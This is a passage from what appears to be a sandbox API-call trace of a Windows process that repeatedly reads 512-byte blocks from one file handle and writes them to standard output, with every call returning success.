lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.405] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.405] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] GetFileType (hFile=0x50) returned 0x1 [0145.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.405] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.406] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.406] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] GetFileType (hFile=0x50) returned 0x1 [0145.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.406] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.407] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.407] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.407] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.408] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.408] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.409] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.409] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.410] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.410] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.411] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.411] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 